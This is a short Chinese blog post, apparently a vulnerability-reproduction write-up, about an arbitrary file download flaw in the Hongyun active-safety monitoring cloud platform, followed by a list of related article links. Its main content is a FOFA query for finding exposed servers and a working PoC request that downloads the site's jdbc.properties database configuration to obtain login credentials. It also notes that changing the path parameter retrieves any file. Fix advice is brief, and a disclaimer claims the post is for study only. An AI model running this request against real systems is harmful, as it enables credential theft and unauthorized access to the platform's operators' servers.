鸿运主动安全云平台任意文件下载漏洞复习

简介

深圳市强鸿电子有限公司鸿运主动安全监控云平台网页存在任意文件下载漏洞,攻击者可通过此漏洞下载网站配置文件等获得登录账号密码

漏洞复现

FOFA语法:body="./open/webApi.html"

获取网站数据库配置文件

POC:/808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

访问 http://ip:port//808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

可直接下载到该文件

替换path=后的文件可导致任意文件下载:

修复建议

访问白名单

添加访问控制

严格限制访问策略

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

相关推荐
Red Red4 小时前
网安基础知识|IDS入侵检测系统|IPS入侵防御系统|堡垒机|VPN|EDR|CC防御|云安全-VDC/VPC|安全服务
网络·笔记·学习·安全·web安全
2401_857610035 小时前
SpringBoot社团管理:安全与维护
spring boot·后端·安全
弗锐土豆7 小时前
工业生产安全-安全帽第二篇-用java语言看看opencv实现的目标检测使用过程
java·opencv·安全·检测·面部
HackKong8 小时前
小白怎样入门网络安全?
网络·学习·安全·web安全·网络安全·黑客
打码人的日常分享8 小时前
商用密码应用安全性评估,密评整体方案,密评管理测评要求和指南,运维文档,软件项目安全设计相关文档合集(Word原件)
运维·安全·web安全·系统安全·规格说明书
爱吃奶酪的松鼠丶8 小时前
Web安全之XSS攻击的防范
安全·web安全·xss
东莞梦幻网络科技软件开发公司8 小时前
开发体育赛事直播平台防止数据泄露的技术安全方案
经验分享·安全
vmlogin虚拟多登浏览器8 小时前
虚拟浏览器可以应对哪些浏览器安全威胁?
服务器·网络·安全·跨境电商·防关联
澜世8 小时前
2024小迪安全基础入门第三课
网络·笔记·安全·网络安全
.Ayang10 小时前
tomcat 后台部署 war 包 getshell
java·计算机网络·安全·web安全·网络安全·tomcat·网络攻击模型